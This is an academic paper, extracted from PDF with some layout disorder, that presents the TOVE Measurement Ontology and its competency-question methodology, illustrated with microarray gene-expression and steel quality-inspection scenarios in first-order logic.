MEASUREMENT ONTOLOGY Finkelstein (1984) defines measurement as the process by which numbers or symbols are assigned to attributes of entities in the real world in such a way as to describe them according to clearly defined rules. In a philosophical discussion of an ontology of measurement units, Mars (1993) summarizes the modern axiomatic treatment of the theory of mathematics (Massey, 1971; Narens, 1985) as the problem of finding an axiomatic introduction of a function φ that assigns a numerical value to an object. Axioms of (1) ordering (a>b ↔ φ(a)≥φ(b), where > denotes an empirical ordering of objects), and (2) extension (φ(a)+φ(b) = φ(a•b), where • denotes an empirical combination of two objects) are central. These axioms are formal and sharable, since they are expressed in mathematics, and represent fundamental measurement concepts. Fenton (1994) relates measurement as fundamental for ensuring software quality, and gives practical guidance in delineating the fundamentals of measurement into “what is measurement” (e.g., types: direct vs. indirect) and “issues for measurement” (e.g., which type of attributes can and cannot be measured, and on what kinds of scales). We synthesize these concepts using the motivation of a real-life enterprise application to transform abstract concepts to explicit ontology terms, definitions, and constraints. A graphical overview of the ontology development steps in the methodology that Gruninger and Fox (1995) used to engineer the TOVE Measurement Ontology representations is shown in Figure 1. These steps involve (1) developing a motivating scenario, (2) designing informal competency questions to capture the scenario, (3) formalizing them to more formal competency questions, and (4) logically deducing the competency questions as a demonstration of competency.
2387
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
The questions that an ontology should be used to answer.
∀A1∀Α2∀Y { A1 ∧ Α2 ⊃ Y }.
Specify capability of ontology to support problem-solving tasks
Formalizations that define and constrain the data model
Prolog populated enterprise model
A: 4
Demonstration of Competency Evaluation of Ontology
A motivating scenario is a detailed narrative about a specific enterprise, where emphasis is placed on problems or tasks it faces. When the scenario is analyzed, enterprise-independent, generic concepts are abstracted to state informal competency questions in natural language that bind the query capability or competency of the ontology. Terms with which such queries can be composed comprise the terminology or data model of the ontology. Queries re-stated using the terminology and restrictive syntax of the ontology are called formal competency questions. Answers to these questions can be logically deduced if axioms that define and constrain the terminology are developed as restrictive semantics. These deductions constitute a demonstration of competency. This methodology, which has posing and answering of informal and formal competency questions as its basis, is arguably the most popular ontology development methodology. According to a search via Google Scholar™ (www.scholar. google.com) in July 2005, Uschold and Gruninger’s (1996) paper on ontological engineering is the fifth most cited paper on computational ontologies, and by far the most popular paper on ontology development methodology. This methodology has been applied to develop ontologies for fields as diverse as knowledge management (Gandon,
2388
2001; Kim, 2002), bioinformatics (Stevens, Goble, & Bechhofer, 2000) and transportation engineering (Schlenoff, Balakirsky, Uschold, Provine, & Smith, 2003). These examples provide ample evidence that the methodology used to develop the measurement ontology can be used to develop ontologies of a wide variety of domains beyond enterprise modeling, the domain from which the ontology originates.
Motivating Scenario 1: Gene Expression Microarrays Functional genomics is the study of gene function and their respective relationships among each other. A multitude of perspectives exist as to the kinds of relationships—phenotypic expression, protein-protein interaction, but microarrays measuring gene expression levels are most commonly used. A number of promising and potential discoveries in functional genomics can be made that include drug discovery, biomarker determination, and biodiversity. We will present a high level description of microarrays, though a detailed description can be found in Mount (2004). To identify the primary concepts for the measurement aspects of microarrays, we consider some of the details of microarray analysis:
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Figure 2. This graph depicts gene/gene relationships that have been experimentally determined (lines—thickness is strength). The two circles are uncharacterized genes. The small shapes are further annotations of information to help the emerging domain scientist explore possible characterizations of the two uncharacterized ones.
2389
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Microarrays measure levels of associated substrate: one chemical species is fixed to a medium—a slide—and collections of other chemical species, that are fluorescently labeled, are brought into contact with the first. Those most strongly attracted adhere—called hybridization—and are then examined to provide some kind of degree of affinity by measuring the light intensities. Controls are added to give baseline indications of affinity and trials are repeated to help establish the quality of results. Recent technological advances have made it possible to measure thousands of these relationships on a single slide.
There are a number of standard activities that take place when conducting microarray experiments. The substrates must be decided upon and procured, then fixed to the slides. The possible other substrates must be prepared by fluorescent labeling before hybridization. After exposure the slides must be washed of unbound substrates, scanned, and intensities displayed numerically.
Used cleverly, many kinds of relationships can be discovered. For example, given a set of genes, we may want to decide if significant interactions exist among them. In the case of functional genomics, gene-gene interactions can be indirectly observed by measuring the amounts of RNA that bind to DNA fragments. Gene expression can be identified with one of four states: up-regulated (enhanced production), equally expressed, no observable change, and down-regulated (inhibited production). Historically, green, black, yellow, and red have been used, respectively, with these four states where various intermediary colors represent a degree of mixing of these states. The final product then is a slide of a rectangular collection of tiny dots of color. These dots of color are actually of ratio of probes labeled with two fluorophores, commonly cyanine 3 (Cy3) peak absorption at 550 nm and emission at 570 nm and cyanine 5 (Cy5) with peak absorption at 649 and emission at 670 nm. The ratio is Cy5:Cy3, where equal intensities of both shows yellow, Cy5 > Cy3 shows red, Cy5 < Cy3 shows green, and black means neither is expressed. Microarrays are subject to numerous statistical variations brought about not only by the complex nature of the technology itself, but also by the sheer number of things being measured. To compare multiple run values must be further processed by, for example, normalization and include dimensions of time, light intensity, treatments, etc. To be at all useful, the quality of output must be well-known. Several methods are applied for improving quality, including sampling and repeated measurement of the same cell (repeat runs).
The concept that can be derived from the above excerpt is the following:
The concept embedded in the decision making process can be simply stated as:
C-2: Quality assessment is made through a system of activities, which perform measurement; this is a view of measurement as an activity.
C-3: Every quality assessment is a decision that begins with a value of measurement at a given point in time.
The key concept (C-1) abstracted from this excerpt is the following: C-1: There must be a systematic way of describing how a particular physical characteristic is to be measured and this description must be used to meet the quality expectations of the scientists. To obtain the next concept, we now consider some of the activities that are involved in microarray analysis.
Finally, we consider the decision process using the measurements: 2390
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Motivating Scenario 2: BHP Steel To show the applicability of the concepts, we take an alternative scenario from a more traditional standpoint of enterprise measurement. BHP Steel is an industrial collaborator for TOVE Measurement Ontology development. The following excerpt describes its losses with respect to cost, time, and revenue when products of unacceptable quality (called non-prime products) are produced. As raw materials are transformed by the different production units of BHP Steel’s supply chain, nonprime products may be produced. These are the products whose physical properties do not satisfy necessary tolerance specifications. Non-prime products lead to lost revenue due to re-grading and scrapping, increased costs due to additional rework, carrying of excess inventory to meet delivery promises, and increased variability of leadtime performance. The same key concept (C-1) can be abstracted from this excerpt: C-4: There must be a systematic way of describing how a particular physical characteristic is to be measured and this description must be used to meet the customer expectations of quality. The next excerpt describes BHP Steel’s need to understand and improve its inspection processes, the collection of activities that assesses whether a product is non-prime. If the products are consistently found to be nonprime, this is an indication that there is something faulty in the production unit. A cause for this occurrence is suspected to be an inadequate inspection processes.
C-5: Quality assessment is made through a system of activities, which perform measurement. The following excerpt specifies what is entailed in determining a product as non-prime. Especially when the product is shipped to the customer, it is essential that the product satisfies the tolerance specifications of the customer. Therefore, the product’s physical characteristics are measured, compared against tolerance specifications and a decision about whether the product is non-prime is made. C-6: Every quality assessment uses a decision process that begins with a value of measurement at a given point in time.
Informal Competency Questions Not only are the informal competency questions developed to elaborate concepts, they are also designed from the findings of the measurement models’ review. Measurement Description System: To elaborate C-1, the transformation of the relationship between an entity and its attributes into the more tractable domain of term, numbers, and operators must be modeled (Grady, 1993). The following then are informal competency questions (e.g., ICQ-1) about requirements: • ICQ-1: Is this a quality requirement? • ICQ-2: What are the physical characteristics that are measured? In measuring physical characteristics, one important aspect is sampling, which occurs when a subset of a population of an evaluated entity is measured, rather than the whole (Scheaffer & McClave, 1982). The following are some questions for representing sampling. •
ICQ-3: Is every entity that is produced measured?
2391
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Figure 3. Measurement description system data model Domain Values sample unit sample population unit population
attribute measured attribute
sample size
attribute sampling
sampling plan
variable sampling specification set standard value unit of measurement
• •
•
•
•
•
ICQ-4: If the product is a batch, is a sample taken from that batch and measured? ICQ-5: If a sample is taken and measured, is the value for the measurement some aggregate (e.g. average) of the measurement upon individual units of that sample? ICQ-6: Or, is the value of the measurement a measure of whether or not individual units of the sample passed or failed a certain threshold (e.g., does the sample in well 34 show up-regulation)? ICQ-7: What ought to be the measured value; that is, what is the expected value for that physical characteristic? ICQ-8: What are the tolerance specifications for a physical characteristic that is measured? ICQ-9: What is the unit of measurement for a physical characteristic of an entity?
Measurement Activities: In order to elaborate C-2, the following questions about measurement and inspection can be asked. • •
ICQ-10: Is this an activity that performs measurement? ICQ-11: Is this an inspection activity?
Measurement Points: In order to elaborate C-3, the elemental piece of information needed
2392
has subclass has attribute
to make a quality assessment can be represented as the value of a measurement taken at a point in time. Following are questions about quality that build on this. •
•
• • •
ICQ-12: What is the measured value for a physical characteristic at a given point in time? ICQ-13: What are the measured values for a physical characteristic during a given period of time? ICQ-14: Is an entity of “good” quality at a given point in time? ICQ-15: Is an entity of “bad” quality at a given point in time? ICQ-16: Is an entity of conforming quality over a given period of time?
The terminology with which these questions can be more formally posed is developed next.
Terminology & Formal Competency Questions TOVE Core Ontologies: TOVE measurement ontology terms are defined with propositions (or Boolean terms) from the TOVE Core Ontologies, which are founded upon a first-order language for representing dynamically changing worlds. This first-order language is called the situation calculus
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Example 1. Core-1 holds( f,s)
Fluent f is true (i.e., holds) in situation s
Core-2 occursT( f,T)
Fluent f occurs in time period T
Example 2. Core-3 organization_agent(Oa) Oa is an organization_agent
an organization agent which seeks to achieve a goal in situation s
entities that must be represented in order to represent the constraints on Oa; X is a vector with none, one, or more entities
predicate name for the agent constraint a first-order logic expression for the constraint described as c(X) Core-5 organizational_constraint(C)
unique identifier for each instance of c(X)
Example 3. Core-6 resource(R)
R is a resource
Core-7 ru(Rt)
Rt is a traceable resource unit
Core-8 has_tru(R,Rt)
Rt is an individual unit within R
Core-9 activity(A)
A is an activity
Core-10 primitive_activity(A) A is a primitive activity Core-11 has_subactivity(A,Ao) Ao is a subactivity in activity A Core-12 consume_res_tru(A,Rt); consume_res_tru(A,R) Core-13 produce_res_tru(A,Rt); produce_res_tru(A,R) Core-14 use_res_tru(A,Rt); use_res_tru(A,R)
Example 4. Core-15 activity_duration(A,T)
Activity A is performed within time T
Core-16 has_point(T,Tp)
Tp is a time point in T
(McCarthy & Hayes, 1969). In situation calculus, each perturbation to the modeled world changes the world from one situation to another. If the truth value of a term, which describes an entity in this world or a relationship between entities, varies from situation to situation, then the term is a fluent . A fluent holds in a given situation, if the term is true in that situation. A fluent occurs in a given time period , if for all situations which
occur during that period, the fluent holds. Note that unless otherwise stated, all predicates of the ontology are fluents, e.g., the predicate presented as organization_agent(Oa) is actually expressed in the ontology as holds(organization_agent(Oa),s). Also, a variable or parameter of a term is denoted within brackets when the term is defined. denotes that ‘R’ is one of the variables of the term resource, e.g. if R=‘chair’ for the expres-
2393
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Example 5. Core-17 has_subclass(X,Xo)
Class X has a subclass Xo
Core-18 has_attribute(X,Ch)
X has an attribute Ch
Core-19 has_attribute_value(X,Ch,V)
Attribute Ch of Object X has value V
an object
a subclass of X
an attribute of X
value of Atr for X
Example 6. Term-1quality_requirement(Qr)
Qr is a quality requirement
Term-2measured_attribute(At)
At is a measured attribute
Term-3samples_attribute(Ch,At)
At is a measured attribute sample of Ch.
Example 7. Term-4
has_sample_sizing(At,Sz)
Measured Attribute At has sample size Sz
Term-5
has_sampling_plan(At,Sp)
At has type of sampling plan Sp
sion resource(R) then this is read as ‘a chair is a resource.’ See Example 1. An agent constraint is a special fluent representing a constraint upon an organization agent that must be satisfied in order for that agent to achieve some goal. See Example 2. Some agent constraints refer to use of resource —a conceptual or prototypical entity such as arm assembly—and tru (traceable resource unit) —a physical set of individual units of a resource, such as ‘lot#123 of arm assemblies’ (Kim, Fox, & Grüninger, 1999), or a microarray assay plate or reagents. An activity may consume trus of one resource to produce trus of another resource, and may use trus of yet another resource; if a tru is used, individual units of the resource that comprise it are not consumed so they are available for use after an activity’s execution. Activities can be hierarchically modeled as comprised of subactivities ; a primitive activity has no sub-activities. Core-12 can be interpreted as “consume resource or tru.” This
2394
interpretation also holds for “produce” and “use.” See Example 3. The time duration within which an activity is performed can be represented as a sequential list of discrete time points . See Example 4. Finally, general object-oriented constructs are represented as seen in Example 5. Measurement Description System: A quality requirement specifies physical characteristics of a resource—e.g., “the number of genes examined or the number of probes used per gene”—that has a bearing on quality, as well as constraints that define acceptable quality. A measured attribute of a sample of a tru—e.g., “average light intensity and color”—is the explicit, exact descriptor of what is measured. So, the following are used to formally express ICQ-1 to ICQ-3. See Example 6. There are two additional issues regarding sampling:
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
tru Rt of Attribute At measured using measurement point Mp at time point Tp
Term-14 conformance_pt(Q,Rt,At,Tp)
Q is a conformance/non-conformance point
Term-15 nonconformance_pt(Q,Rt,At,Tp)
with related tru Rt, attribute At at time Tp.
Example 11. Term-16 conforming_quality(X,Qr)
•
•
Sample Size: How many individuals in a set are measured to model the characteristics of the set? Sampling Plan: When determining an aggregate value from the sample, does it refer directly to the actual attribute that is physically measured or is the reference indirect?
Therefore, the terms in Example 7 are used to express ICQ-4 to ICQ-6. To express ICQ-7 to ICQ-9, a standard value μ for what the value of a measured attribute ought to be is represented, as well as a function of μ and σ2 ( f(μ,σ2)) and an operator (⊗). Unit of measurement is also represented. For a measured attribute , a subset [μ−kσ2, μ+kσ2], a generic term called a specification set is represented, where elements of this subset denote acceptable measurement values. See Example 8.
Measurement Activities: The simplest measurement action is the measurement of one measured attribute of one tru at one point in time. When this measurement is performed using a special resource called a measuring resource, this activity is a primitive measure activity. A primitive measure activity or an aggregation of primitive measure activities is a measure activity. An inspection and test activity is a form of a measure activity. The following terms then are used to formally express ICQ-10 and ICQ-11. See Example 9. Measurement Point: To formally express ICQ-12 and ICQ-13, the result of a measurement activity is represented using a measurement point , relating the value of the measurement, and concomitantly the measured attribute , the time of measurement , and tru measured . See Example 10. The following term then represents the concept that “quality is conformance to requirements.” See Example 11.
2395
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Example 12. CQ-1
Does there exist a quality requirement ‘θρ’1 in a situation ‘σ’? holds(quality_requirement(‘θρ’),σ).
CQ-2
Does there exist a measured attribute for a tru ‘κ’ in a situation ‘σ’?
Using these terms, ICQ-14 to ICQ-16 are expressed. Informal competency questions are stated formally next.
Formal Competency Questions For brevity, only the competency questions for the measurement description system are presented. The informal competency question is re-stated in English using the terminology developed from the ontology, then expressed formally in First-Order Logic. Measurement Description System: See Example 12.
Axioms The axioms in the ontology are presented next. Once again, we only describe the axioms for the measurement description system for lack of space. Measurement Description System: A categorical characterization of the content of all quality requirements is difficult; axioms about quality requirements true for all enterprises in all industries are not likely to exist. Rather, quality requirement is stated as a primitive term (PT)—a
2396
term that is instantiated and stated as a fact in the populated enterprise model—in the TOVE measurement ontology. That is, the enterprise modeler determines that a given agent constraint is a quality requirement and states this as a fact. All definition (Defn) axioms are ultimately formally defined in terms of primitive terms. By applying constraint (Cons) axioms, proper use of primitive terms is enforced. Primitive terms are populated (instantiated) as ground terms; e.g. a fact that ‘widget’ is a resource is represented as a ground term, resource (widget), which is an instance of the primitive term, resource(R). Measured attribute and samples attribute are also primitive terms. The quality of an activity is evaluated by the quality of resources associated with that activity; and the quality of a resource (prototypical product) is gauged by the quality of trus comprised of individual units of that resource. The constraint axioms in Example 13 express this. These axioms ensure valid answers for ICQ-2. Additional such constraints constrain the use of the primitive terms has_sample_sizing, has_sampling_plan, has_standard_value, has_specification_set, and has_unit_of_measurement. The
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Example 13. Cons-1
A measured attribute must be an attribute of a tru.
Cons-2
measured attribute must be sampled from an attribute of a resource
∀At∀s [ holds(measured_attribute(At),s) → ∃Atr∃R ( holds(samples_attribute(Atr,At),s) ∧ holds(has_attribute(R,Atr),s) ∧ holds(resource(R),s) ) ]. measured attribute attribute sampled for At tru for which At is an attribute resource for which Atr is an attribute an extant or hypothetical situation
Example 14. Cons-3
All measured attributes must have a specification set, and the standard value for that measured attribute must be an element of the specification set.
upper and lower bounds of a specification set for a measured attribute of ratio scale
a set of “acceptable” values for the measured attribute
the standard value for At
an extant or hypothetical situation
axiom in Example 14 ensures valid answers for ICQ-8.
DEMONSTRATION OF COMPETENCY A demonstration of competency entails using the TOVE ontological engineering methodology for the following: •
•
Microarray Analysis: Does an ontology support problem-solving tasks for a specific pathway—wing development in Drosophila melanogaster? Ontology Development: Are ontology competency questions—which by design do not refer to any specific domain—answered, thus demonstrating that the ontology can
be used to support similar problem-solving tasks for other domains? The first question characterizes requirements for an analyst familiar with the domain, not the ontology’s language or representations; the second question is relevant for an engineer with expertise in ontology-based enterprise modeling who is unfamiliar with details of the specific domain modeled. An advisor is a user interface and access routines front-end software to an ontology-based enterprise model. Table 1 lists how an advisor answers the two different questions. We now provide the actual process in which each of the steps in Table 1 manifests in the ontology by identifying parts of the motivating scenario that correspond to the ontology predicates (see Table 2). This can be demonstrated computationally using the ISO 9000 Quality Advisor (Kim & 2397
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Table 1. Steps for using an advisor for demonstrating competency Step #
Bioinformatician View: Using the Advisor to Analyze Specific Enterprise
Ontology Builder View: Using the Advisor to Evaluate Competency of Ontology
1
Stating facts about experimental conditions
⇔
Representing populated enterprise model
2
Stating explicit gene-gene relationships
⇔
Representing formal competency questions
3
Stating data dictionary of experimental terms
⇔
Representing ontology terminology and axioms
4
Answering queries
⇔
Deducing answers to formal competency questions
⇔ denotes translation between knowledge about an enterprise and how that knowledge is represented using an ontology
Table 2.
2398
#1
Stating facts about the process
⇔
Representing populated model
Emerging
“collections are fluorescently labeled”
⇔
holds(activity(process_fl_label), sw_actual)
Traditional
“There are many activities…” from Motivating Scenario
⇔
holds(activity(process_wp_hcpf_260_1),sv_actual).
#2
Stating queries for analyzing process
⇔
Representing formal competency questions
Emerging
“Is this an activity in which a specific gene is determined to be underexpressed?”
⇔
holds(inspect_and_test(α),σ).
Traditional
“Is this an activity in which products are determined to be non-prime?”
⇔
holds(inspect_and_test(α),σ).
#3
Stating data dictionary of actual process’s terms
⇔
Representing ontology terminology and axioms
Emerging
“An activity where a gene is determined to be unexpressed is an inspect and test activity according to the TOVE Measurement Ontology”
“The inspections are done through an activity which measures the average light intensity for a specific cell using a light sensor”
⇔
holds(inspect_and_test(Cij), s)
Traditional
“The inspections are done through an activity which measures the average coil length using a sensor.”
⇔
holds(inspect_and_test(A),s) ≡ …
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Fox, 2002), a tool for evaluating ISO 9000 compliance of an enterprise modeled using ontologies. Evaluation entails answering questions about an enterprise’s inspection and measurement system, so it can be used for enterprise analysis, as well as for assessing the competency of the measurement ontology. A complete demonstration of competency using all of the components of the ontology is beyond the scope of this article because of length restrictions. A full demonstration is shown in (Kim, 1999), which also includes a demonstration of generalizability of the measurement ontology.
COMMENTARY ON GENERALIZABILITY In our full demonstration of generalizability (Kim, 1999), we show that the measurement ontology’s representations could be used to perform similar tasks as a related application. Specifically, it is shown that parts of SAP’s quality control management model (SAP-AG, 1995) could be reasonably “reduced” or represented using only ontology representations. The implication then is that a query answerable using the SAP™ data model is answerable as a competency question posed and answered using the ontology. That is, the ontology is as “competent” as SAP™ with respect to the reduced set of competency questions. Whereas that demonstration provides evidence of intra-domain, inter-application (using different models [or ontologies] in a similar domain) generalizability of the ontology, what we have shown in Table 2 provides evidence of inter-domain, intra-application (using same model [ontology] for different domains) generalizability. That is, we show that same set of general measurement representations can be used to pose and answer competency questions from two different domains. We cannot claim that the measurement ontology can be a “plug-and-play” ontology for
all other domains. Rather, we can claim that the ontology’s representations can be used to define terms and express axioms for more domain-specific ontologies. The basis of this claim is the core of the methodology used: competency questions. If informal competency questions associated with a specific domain can be reasonably posed as formal competency questions represented using measurement ontology representations, we can make an inductive argument that the measurement ontology is generalizable to that domain. To that end, we show in Table 3 how the informal competency questions from measuring the quality of service (QoS) of Web services and agriculture (tracking cattle) domains relate to the informal competency questions that motivated this ontology. It is evident then that the measurement ontology can serve as a very re-usable, generalizable basis to develop more committed ontologies of highly diverse fields, from measuring QoS to tracking cattle.
CONCLUDING REMARKS There is clearly a need for an ontology that represents both the obvious and more subtle fundamental concepts in measurement. This is certainly true in emerging domains like bioinformatics where quality plays such a vital and critical role in discovery. A measurement ontology is particularly useful for builders of Semantic Web ontologies of emerging domains because of the importance of measurement in these domains, which are firmly grounded in the physical sciences. The measurement concepts represented in this article are summarized as follows: •
A system for assessing measurements includes the appropriate measured attribute, as well as its standard value (μ), sampling plan and size, specification set of “acceptable values” of f(μ,σ2), and unit of measurement. Measurements of attributes are recorded
2399
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Table 3. Manufacturing (Basis for Measurement Ontology)
Measuring QoS for Web services
Tracking cattle via RFID
ICQ-2: What is the physical characteristic that is measured?
What is the QoS metric that is measured? Answer could be mean response time, and facts could be represented using the ontology as has_attribute(message121,response_time) measured_attribute(mean_response_time)
Which data about beef quality needs to be collected? Answers could be fat thickness, and facts could be represented using the ontology as has_attribute(cowcarcass1871,fa t_thickness).
ICQ-3: Is every entity that is produced measured?
Is the response time for every message measured? Answer would be yes and represented as Has_sample_sizing(mean_response_ time,sample_population) to signify that the population is sampled—i.e. response times for all packets that comprise a message are calculated. If only some packets were sampled then this would be represented as has_sample_ sizing(mean_response_time,sample).
Is every carcass measured? Answer would be yes and represented as has_sample_sizing(fat_ thickness,unit_sample) to signify that each unit is sampled.
ICQ-5: If a sample is taken and measured, is the value for the measurement some aggregate (e.g. average) of the measurement upon individual units of that sample?
Are the response times for a message averaged? Answer is yes, since the mean response time for a message is the average of the response times of all packets that comprise that message. This would be represented as samples_attribute(mean_response_ time,response_time) and has_sampling_ plan(mean_response_time,attribute_sampling).
Is the mean fat thickness of each carcass from a lot averaged? Answer is no, since fat thickness is tracked individually and not associated with the lots that identify the herd of origin.
as measurement points in time that are assigned a value as a result of some measurement activity. These representations are the basic ones necessary to model any form of measurement. Quality can be represented as some composition of conformance points, which are “conforming” measurement points with respect to some quality requirement. Representing quality requirements, measurement points, and conformance points makes it possible to model and assess any entity within an enterprise as of conforming quality.
demonstrated by automatically deducing answers to questions such as:
These concepts are formally represented by posing competency questions, analyzing the domain of measurement, stating assumptions, and developing terminology and axioms. Then, the competency of the ontology and its capability for use to gain insights about an enterprise are
Measurement theory is more than just measurement unit conversions and quantities. The root of our contribution is that we present an ontology that represents more concepts than other ontologies. This general ontology is then a useful reference regardless of whether it serves as a building
•
2400
•
•
Quality Assessment System Competency Questions: What is the standard value for a given measured attribute of an entity? What is its specification set? How is the measured attribute sampled? Measurement and Conformance Points Competency Questions: What is the measurement point for a measured attribute? Is it a conformance point? Over a period of time, is an entity of conforming quality?
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
block for traditional or emerging domains, or for the Semantic Web or closed networks. With such an ontology in tow, developers of Semantic Web ontologies of emerging domains as diverse as biology and geography have a reference for ensuring that important and subtle measurement concepts are diligently represented in their ontologies and not ignored. The clear future direction for this work is to (1) transform this ontology so that its representations are more general, and that ontological commitment made towards enterprise applications is further abstracted out; (2) develop separate domain specific ontologies of emerging domains that actually define and restrict their terms using the general ontology developed in (1) (as opposed to the realistic use of this ontology, which is to serve as inspiration and reference); and (3) implement both the general and the domain specific ontologies in the de facto ontology language of the Semantic Web, OWL. Overall we believe that we have inspired builders of emerging domain ontologies to incorporate important common-sense of their domains—that of obvious and subtle measurement concepts—in their ontologies, so that their ontologies will be more robust and sharable for functioning on the Semantic Web.
REFERENCES Allen, J. F. (1983). Maintaining knowledge about temporal intervals. Communications of the ACM, 26(11), 832-843. Ashburner, M., Ball, C., Blake, J., Botstein, D., Butler, H., Cherry, J., et al. (2000). Gene ontology: Tool for the unification of biology. National Genetics, 25, 25-29. Attie, A. D. (2003). The new industrialized approach to biology. Cell Biology Education, 2, 150-151.
Bechhofer, S., Goble, C., & Horrocks, I. (2001, July 30-August 1). DAML+OIL Is not Enough. Paper presented at the First Semantic Web Working Symposium (SWWS-01), Stanford, CA. Berners-Lee, T., Hendler, J., & Lassila, O. (2001). The Semantic Web. Scientific American, 284(5), 34-43. Bowers, S., & Ludäscher, B. (2004). An ontology-driven framework for data transformation in scientific workflows. Paper presented at the International Workshop on Data Integration in the Life Sciences (DILS’04), Leipzig, Germany. Brilhante, V., & Robertson, D. (2001). MetadataSupported Automated Ecological Modelling. In C. Rautenstrauch (Ed.), Environmental information systems in industry and public administration. Hershey, PA: Idea Group Publishing. Campbell, A. E., & Shapiro, S. C. (1995). Ontological mediation: An overview. Paper presented at the IJCAI Workshop on Basic Ontological Issues in Knowledge Sharing. Chen, Y., Zhou, L., & Zhang, D. (2006). Ontology-supported Web service composition: An approach to service-oriented knowledge management in corporate services. Journal of Database Management, 17(1), 67-84. Davies, J., Duke, A., & Stonkus, A. (2002). OntoShare: Using ontologies for knowledge sharing. Paper presented at the Semantic Web Workshop of the WWW Conference, Hawaii, HI. Duggan, D. J., Chen, M., Meltzer, P., & Trent, J. (1999). Expression profiling using cDNA microarrays. Nature Genetics, 21, 10-14. Fenton, N. E. (1994). Software measurement: a necessary scientific basis. IEEE Transactions on Software Engineering, 20(3), 199-206. Fikes, R., & Farquhar, A. (1999). Distributed repositories of highly expressive reusable ontologies. IEEE Intelligent Systems, 14(2), 73-79.
2401
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Finkelstein, L. (1984). A review of the fundamental concepts of measurement. Measurement, 2(1), 25-34. Fox, M. S. (1992). The TOVE project, towards a common sense model of the enterprise. In C. Petrie (Ed.), Enterprise integration. Cambridge, MA: MIT Press. Fox, M. S., & Gruninger, M. (1998). Enterprise modelling. AI Magazine, 19(3), 109-121. Gandon, F. (2001, October 22-24). Engineering an ontology for a multi-agents corporate memory system. Paper presented at the ISMICK 2001 Eighth International Symposium on the Management of Industrial and Corporate Knowledge, Université de Technologie de Compiègne, France.
logical Issues in Knowledge Sharing, IJCAI-95, Montreal, Canada. Hayes, P. J. (1985). Naive physics I: Ontology for liquids. In J. Hobbs & B. Moore (Eds.), Theories of the commonsense world (pp. 71-89). Ablex Publishing Corp. Heflin, J. (2000, April 3, 2000). Measurement ontology 1.0 (draft). Retrieved August 15, 2004, from http://www.cs.umd.edu/projects/plus/SHOE/onts/ measure1.0.html Hewett, M., Oliver, D. E., Rubin, D. L., Easton, K. L., Stuart, J. M., Altman, R. B., et al. (2002). PharmGKB: the pharmaco-genetics knowledge base. Nucleic Acids Research, 30(1), 163-165.
Gandon, F. L., & Sadeh, N. M. (2004). Semantic Web technologies to reconcile privacy and context awareness. Journal of Web Semantics, 1(3), 241-260.
Khatri, V., Ram, S., & Snodgrass, R. T. (2004). Augmenting a conceptual model with geospatiotemporal annotations. IEEE Transactions on Knowledge and Data Engineering, 16(11), 1324-1338.
Goh, C. H., Bressan, S., Madnick, S., & Siegel, M. (1999). Context interchange: New features and formalisms for the intelligent integration of information. ACM Transactions on Information Systems, 17(3), 270-293.
Kim, H. M. (1999). Representing and reasoning about quality using enterprise models. Unpublished PhD thesis, Department of Industrial Engineering, University of Toronto, Toronto, Ontario, Canada.
Grady, J. O. (1993). System requirements analysis: McGraw-Hill Inc.
Kim, H. M. (2002, January 7-10). XML-hoo!: A prototype application for intelligent query of XML documents using domain-specific ontologies. Paper presented at the 35th Annual Hawaii International Conference on Systems Science (HICSS-35), Hawaii, HI.
Gruber, T. R. (1993, March). Towards principles for the design of pntologies used for knowledge sharing. Paper presented at the International Workshop on Formal Ontology, Padova, Italy. Gruber, T. R., & Olsen, G. R. (1994). An ontology for engineering mathematics. Paper presented at the Fourth International Conference on Principles of Knowledge Representation and Reasoning, Bonn, Germany. Gruninger, M., & Fox, M. S. (1995). Methodology for the design and evaluation of ontologies. Paper presented at the Workshop on Basic Onto-
2402
Kim, H. M., & Fox, M. S. (2002, January 4-7). Using enterprise reference models for automated ISO 9000 compliance evaluation. Paper presented at the 35th Hawaii International Conference on Systems Science (HICSS), Big Island, HI. Kim, H. M., Fox, M. S., & Grüninger, M. (1999). An ontology for quality management: Enabling quality problem identification and tracing. BT Technology Journal, 17(4), 131-139.
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Klischewski, A. R., & Jeenicke, M. (2004). Semantic Web technologies for information management within e-government services. Paper presented at the 37th Annual Hawaii International Conference on System Sciences (HICSS’04), Big Island, HI. Kuipers, B. J. (1986). Qualitative simulation. Artificial Intelligence, 29(3), 289-338. Lenat, D. B. (1995). CYC: A large-scale investment in knowledge infrastructure. Communications of the ACM, 38(11), 33-38. Lesk, A. M. (2005). Databasse annotation in molecular biology, principles and practice: John Wiley & Sons Ltd. Lozano-Tello, A., & Gomez-Perez, A. (2004). ONTOMETRIC: A method to choose the appropriate ontology. Journal of Database Management, 15(2), 1-18. Mars, N. J. I. (1993, March 10-13). An ontology of measurement units. Paper presented at the International Workshop on Formal Ontologies in Conceptual Analysis and Knowledge Representation, Padova, Italy. Massey, B. S. (1971). Units, dimensional analysis, and physical similarity. London: Van Nostrom Reinhold. McCarthy, J., & Hayes, P. J. (1969). Some philosophical problems from the standpoint of AI. In B. Meltzer & D. Michie (Eds.), Machine intelligence (Vol. 4, pp. 463-501). Edinburgh, UK: Edinburgh University Press. McGuinness, D. L., & van Harmelen, F. (2003). OWL Web Ontology Language overview (No. CR-owl-features-20030818). W3C. Milton, S. K., & Kazmierczak, E. (2004). An ontology of data modelling languages: A study using a common-sense realistic ontology. Journal of Database Management, 15(2), 19-38.
